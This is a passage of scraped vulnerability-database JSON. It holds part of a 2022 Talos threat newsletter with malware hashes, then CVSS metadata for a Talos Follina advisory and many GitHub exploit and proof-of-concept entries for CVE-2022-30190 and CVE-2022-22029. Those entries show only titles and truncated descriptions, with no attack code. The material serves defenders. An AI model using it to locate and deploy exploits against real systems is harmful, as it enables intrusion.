Boy](<https://www.latimes.com/entertainment/la-et-media-balloon-boy-pictures-photogallery.html>). \n\n \n\n\n \n\n## The one big thing \n\n> \n\n\nThe U.S. Cybersecurity and Infrastructure Security Agency is asking all federal agencies to [patch for an actively exploited Microsoft vulnerability](<https://threatpost.com/cisa-urges-patch-11-bug/180235/>) disclosed last week. By adding CVE-2022-22047, an elevation of privilege vulnerability affecting the Windows Client Server Runtime Subsystem (CSRSS), to its [list of known exploited vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), agencies are compelled to patch for the issue by Aug. 2. Microsoft and CISA both say attackers are actively exploiting the issue in the wild. \n\n\n> ### Why do I care? \n> \n> This vulnerability is the only one disclosed as part of [last week\u2019s Patch Tuesday](<https://blog.talosintelligence.com/2022/07/microsoft-patch-tuesday-for-july-2022.html>) that\u2019s been exploited in the wild. An attacker could exploit this vulnerability to execute code on the targeted machine as SYSTEM. However, they would need physical access to a machine to exploit the issue. That being said, if CISA is warning users that it\u2019s being actively exploited in the wild, it\u2019s good of a time as any to remember to patch. \n\n> \n> ### So now what? \n> \n> [Our Patch Tuesday blog post](<https://blog.talosintelligence.com/2022/07/microsoft-patch-tuesday-for-july-2022.html>) contains links to Microsoft\u2019s updates for Patch Tuesday and a rundown of other vulnerabilities you should know about. Additionally, we have [multiple Snort rules](<https://snort.org/advisories/talos-rules-2022-07-12>) that can detect attempts to exploit CVE-2022-22047. \n\n> \n> \n\n## Other news of note\n\n \n\n\nThe U.S. Department of Homeland Security declared the Log4shell vulnerability is \u201cendemic\u201d and will present a risk to organizations for at least the next decade. A new report into the major vulnerability in Log4j declared that the open-source community does not have enough resources to properly secure its code and needs the public and private sector to assist with the implementation of patches. They also warned that there are still many instances of vulnerable software that attackers could take advantage of. The DHS report also says the original vulnerable code could have been detected in 2013 had the reviewers had the time had the appropriate cybersecurity knowledge to spot the flaw. That being said, the investigating panel said there were no major cyber attacks against U.S. critical infrastructure leveraging Log4shell. ([Dark Reading](<https://www.darkreading.com/application-security/dhs-review-board-deems-log4j-an-endemic-cyber-threat>), [Associated Press](<https://apnews.com/article/biden-technology-software-hacking-4361f6e9b386259609b05b389db4d7bf>), [ZDNet](<https://www.zdnet.com/article/log4j-flaw-why-it-will-still-be-causing-problems-a-decade-from-now/>)) \n\nThe European Union is warning that increased cyber attacks from Russian state-sponsored actors run the risk of unnecessary escalation and spillover effects to all of Europe. A formal EU declaration says that member nations \u201cstrongly condemn this unacceptable behaviour in cyberspace and express solidarity with all countries that have fallen victim.\u201d A Lithuanian energy firm was the recent target of a distributed denial-of-service attack that the country said was the largest cyber attack in a decade. Belgian leaders also say their country was recently targeted by several Chinese state-sponsored groups. ([Bleeping Computer](<https://www.bleepingcomputer.com/news/security/eu-warns-of-russian-cyberattack-spillover-escalation-risks/>), [Council of the European Union](<https://www.consilium.europa.eu/en/press/press-releases/2022/07/19/declaration-by-the-high-representative-on-behalf-of-the-european-union-on-malicious-cyber-activities-conducted-by-hackers-and-hacker-groups-in-the-context-of-russia-s-aggression-against-ukraine/>), [Infosecurity Magazine](<https://www.infosecurity-magazine.com/news/lithuanian-energy-ddos-attack/>)) \n\nA relatively small botnet is suspected to be behind more than 3,000 recent distributed denial-of-service attacks. The Mantis botnet, which is suspected to be an evolution of Meris, has already targeted users in Germany, Taiwan, South Korea, Japan, the U.S. and the U.K. Most recently, it launched a malware campaign against Android users in France, using malicious SMS messages to lure victims into downloading malware that adds devices to the botnet\u2019s growing system. Security researchers say users have already downloaded the malware about 90,000 times. ([Bleeping Computer](<https://www.bleepingcomputer.com/news/security/roaming-mantis-hits-android-and-ios-users-in-malware-phishing-attacks/>), [ZDNet](<https://www.zdnet.com/article/this-tiny-botnet-is-launching-the-most-powerful-ddos-attacks-yet/>)) \n\n \n\n\n## Can\u2019t get enough Talos? \n\n * _[Vulnerability Spotlight: Issue in Accusoft ImageGear could lead to memory corruption, code execution](<https://blog.talosintelligence.com/2022/07/accusoft-vuln-spotlight-.html>)_\n * _[EMEAR Monthly Talos Update: Training the next generation of cybersecurity researchers](<https://blog.talosintelligence.com/2022/07/emear-monthly-talos-update-training.html>)_\n * _[Beers with Talos Ep. #123: Hunting for ransomware actors on *whispers* the dark web](<https://talosintelligence.com/podcasts/shows/beers_with_talos/episodes/123>)_\n * _[Talos Takes Ep. #104: The psychology of multi-factor authentication](<https://talosintelligence.com/podcasts/shows/talos_takes/episodes/104>)_\n * _[Pakistani Hackers Targeting Indian Students in Latest Malware Campaign](<https://thehackernews.com/2022/07/pakistani-hackers-targeting-indian.html>)_\n \n\n\n \n\n\n## Upcoming events where you can find Talos \n\n#### \n\n\n**[A New HOPE](<https://www.hope.net/index.html>) **(July 22 - 24, 2022) \nNew York City \n\n \n\n\n**[CTIR On Air](<https://www.linkedin.com/video/event/urn:li:ugcPost:6954879507132481537/>) **(July 28, 2022) \nTalos Twitter, LinkedIn and YouTube pages\n\n[ \n](<https://www.ciscolive.com/global.html>)[**BlackHat**](<https://www.blackhat.com/us-22/>) **U.S. **(Aug. 6 - 11, 2022) \nLas Vegas, Nevada \n\n \n\n\n**[DEF CON U.S.](<https://defcon.org/>) **(Aug. 11 - 14, 2022) \nLas Vegas, Nevada \n\n \n\n\n \n\n\n## Most prevalent malware files from Talos telemetry over the past week \n\n** \n**\n\n**SHA 256: **[9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507](<https://www.virustotal.com/gui/file/9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507/details>) \n\n**MD5: **2915b3f8b703eb744fc54c81f4a9c67f \n\n**Typical Filename: **VID001.exe ** **\n\n**Claimed Product:** N/A** **\n\n**Detection Name: **Win.Worm.Coinminer::1201 \n\n** \n**\n\n**SHA 256: **[e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934](<https://www.virustotal.com/gui/file/e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934/details>)** \n****MD5: **93fefc3e88ffb78abb36365fa5cf857c ** \n****Typical Filename: **Wextract \n**Claimed Product: **Internet Explorer \n**Detection Name: **PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg \n\n \n\n\n**SHA 256: **[e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c](<https://www.virustotal.com/gui/file/e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c/details>) ** **\n\n**MD5:** a087b2e6ec57b08c0d0750c60f96a74c \n\n**Typical Filename: **AAct.exe ** **\n\n**Claimed Product:** N/A ** **\n\n**Detection Name: **PUA.Win.Tool.Kmsauto::1201** **\n\n** \n**\n\n**SHA 256: **[ea500d77aabc3c9d440480002c3f1d2f2977a7f860f35260edda8a26406ca1c3](<https://www.virustotal.com/gui/file/ea500d77aabc3c9d440480002c3f1d2f2977a7f860f35260edda8a26406ca1c3/details>)** **\n\n**MD5: **5741eadfc89a1352c61f1ff0a5c01c06** **\n\n**Typical Filename: **3.exe \n\n**Claimed Product: **N/A\n\n**Detection Name: **W32.DFC.MalParent \n\n \n\n\n**SHA 256: **[125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645](<https://www.virustotal.com/gui/file/125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645/details>) ** **\n\n**MD5: **2c8ea737a232fd03ab80db672d50a17a \n\n**Typical Filename:** LwssPlayer.scr \n\n**Claimed Product: **\u68a6\u60f3\u4e4b\u5dc5\u5e7b\u706f\u64ad\u653e\u5668 \n\n**Detection Name: **Auto.125E12.241442.in02", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-21T18:00:00", "type": "talosblog", "title": "Threat Source newsletter (July 21, 2022) \u2014 No topic is safe from being targeted by fake news and disinformation", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22047"], "modified": "2022-07-21T18:00:00", "id": "TALOSBLOG:F032D3BBC6D695272384D4A3821130BF", "href": "http://blog.talosintelligence.com/2022/07/threat-source-newsletter-july-21-2022.html", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-02T23:58:44", "description": "A recently discovered zero-day vulnerability in the Microsoft Windows Support Diagnostic Tool (MSDT) made headlines over the past few days. CVE-2022-30190, also known under the name \"Follina,\" exists when MSDT is called using the URL protocol from an application, such as Microsoft Office, Microsoft... \n \n[[ This is only the beginning! Please visit the blog for the complete entry ]]", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-02T14:53:52", "type": "talosblog", "title": "Threat Advisory: Zero-day vulnerability in Microsoft diagnostic tool MSDT could lead to code execution", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-02T14:53:52", "id": "TALOSBLOG:DE5281D9A4A03E4FA1F2A0B62B527489", "href": "http://blog.talosintelligence.com/2022/06/msdt-follina-coverage.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-08-18T11:45:05", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-18T06:23:53", "type": "githubexploit", "title": "Exploit for Code Injection in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22029"], "modified": "2022-07-18T08:21:24", "id": "B13A8262-323C-5D9D-BA90-C5D9C3816AE8", "href": "", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-10-23T20:04:43", "description": "# CVE-2022-30190\n**S...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-23T15:24:43", "type": "githubexploit", "title": "Exploit for Vulnerability in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-10-23T15:34:15", "id": "E917FE93-F06C-5F70-915F-A5F48A30B044", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T17:30:39", "description": "# AmzWord\r\n\r\nan automated attack chain based on CVE-2022-30190, ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2023-11-28T03:47:32", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-11-28T07:49:28", "id": "296ECE66-CC92-53E6-9959-06669247F867", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:27:31", "description": "# CVE-2022-30190_EXP_PowerPoint\n\nThis is exploit of CVE-2022-301...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-29T08:48:12", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-28T11:40:13", "id": "705BFDF7-98C8-5300-AB18-E9EEE465AE5F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:32:09", "description": "# Follina-CVE-2022-30190-Unofficial-patch-\nAn Unofficial Patch F...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-13T04:20:02", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-28T11:39:41", "id": "56417A88-33CB-520F-8FC3-4F3E49561DDC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T19:46:48", "description": "# Follina-CVE-2022-30190-Sample-by-ethical-blue\n Educational Fol...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-25T16:27:59", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-01T22:51:35", "id": "FB757D3A-A896-5AB5-B72B-7C880581D12E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:42:23", "description": "# Follina Proof of Concept (CVE-2022-30190)\n\nQuick and easy \"pro...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-31T10:47:57", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-07-17T17:01:27", "id": "02FCE52D-5E91-5C57-A40A-DE4FF7C726A3", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:02:04", "description": "<h1 align='center'><b> Follina-attack-CVE-2022-30190-</b></h1><b...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-10-06T11:41:43", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-10-06T15:42:31", "id": "E7177DCC-97D5-5A91-8A06-124DD3CB9739", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:37:19", "description": "# follina (POC)\nAll about CVE-2022-30190, aka follina, that is a...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-03T00:25:37", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-10-23T21:37:30", "id": "221070D3-0B31-5CF7-A508-B4740B63647B", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:30:46", "description": "# FollinaExtractor\nExtract ...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-15T02:22:53", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-11-24T20:26:05", "id": "675E960A-9F2E-5575-8C21-8528492BE5C6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T19:12:48", "description": "# CVE-2022-30190-follina\nJust another PoC for the new MSDT-Explo...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-01T11:37:08", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-28T11:39:19", "id": "B2474BAA-4133-5059-8F0B-5BAAE9664466", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T19:49:05", "description": "[![](https://forthebadge.com/images/badges/made-with-python.svg)...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-11-19T18:09:47", "type": "githubexploit", "title": "Exploit for Externally Controlled Reference to a Resource in Another Sphere in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2023-09-28T11:43:57", "id": "DD36D028-7FB1-5824-9756-09BA3927DCEE", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2023-12-06T20:38:42", "description": "# MSDT Patcher, a.k.a. CVE-2022-30190-NSIS\nThis is an NSIS scrip...", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", 